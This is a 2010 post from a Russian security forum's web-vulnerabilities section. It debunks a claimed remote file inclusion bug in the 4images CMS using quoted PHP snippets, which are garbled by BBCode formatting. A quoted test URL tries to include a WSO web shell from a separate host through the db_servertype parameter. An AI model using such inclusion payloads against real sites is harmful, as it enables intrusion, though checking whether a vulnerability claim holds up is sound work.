HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 14.09.2010, 17:05
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

Цитата:
Сообщение от mr.celt  
mr.celt said:
Сегодня покопался на inj3ct0r.com и меня заинтересовал этот пост
link
Решил потестить на локальной машине. Скачал CMSку (1.7.8) с официального сайта, развернул и настроил как в мане написано.
Попробовал заюзать описанную уязвимость так
http://4images.local/global.php?db_servertype=http://shell.local/wso.txt%00
4images.local и shell.local - локальные домены.
Кроме надписи "Security violation" ничего не увидел.
Кто-нибудь тестил у себя? После просмотра исходника сложилось впечатление, что глобальный инъект невозможен, но может че-то сам не доганяю.
В самом начале

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (![/COLOR][COLOR="#0000BB"]defined[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'ROOT_PATH'[/COLOR][COLOR="#007700"])) {

die([/COLOR][COLOR="#DD0000"]"Security violation"[/COLOR][COLOR="#007700"]);

}

[/
COLOR][/COLOR
Константа не определена это раз

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]81 $db_servertype[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"mysql"[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]384[/COLOR][COLOR="#007700"]include_once([/COLOR][COLOR="#0000BB"]ROOT_PATH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'includes/db_'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$db_servertype[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);

[/
COLOR][/COLOR
Переменная $db_servertype определена ..никаких инжектов нету.

а иньектор это команда плагиаторов-дебилойдов которые любят подобное гавно постить чтобы свой говно сайт в гугле поднять
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Уязвимости CMS / форумов 316 08.06.2010 09:56
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ